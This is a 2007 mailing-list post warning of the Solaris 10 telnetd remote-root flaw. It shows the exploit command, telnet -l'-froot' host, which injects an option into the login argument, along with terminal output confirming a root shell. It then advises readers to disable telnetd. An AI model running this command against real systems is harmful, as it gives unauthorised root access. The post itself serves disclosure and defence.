[rescue] Solaris 10 Remote-Root Exploit
Jonathan C. Patschke
jp at celestrion.net
Mon Feb 12 07:45:40 CST 2007
Just saw this on Slashdot:
http://riosec.com/solaris-telnet-0-day
And verified that it works:
[jp at cobra:~]$ telnet -l"-froot" lic4
Trying 10.10.100.120...
Connected to lic4.centtech.com.
Escape character is '^]'.
Last login: Wed Jan 17 16:53:28 from hal10.centtech.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
You have mail.
# Connection closed by foreign host.
[jp at cobra:~]$ exit
Connection to cobra.centtech.com closed.
If you have any public-facing systems running Solaris's telnetd, you
should disable it now. Even turning off remote root logins is
insufficient, since this seems to bypass PAM.
--
Jonathan Patschke ) "I would buy a Mac today if I was not working at
Elgin, TX ( Microsoft." --Jim Allchin, VP of Platforms
More information about the rescue
mailing list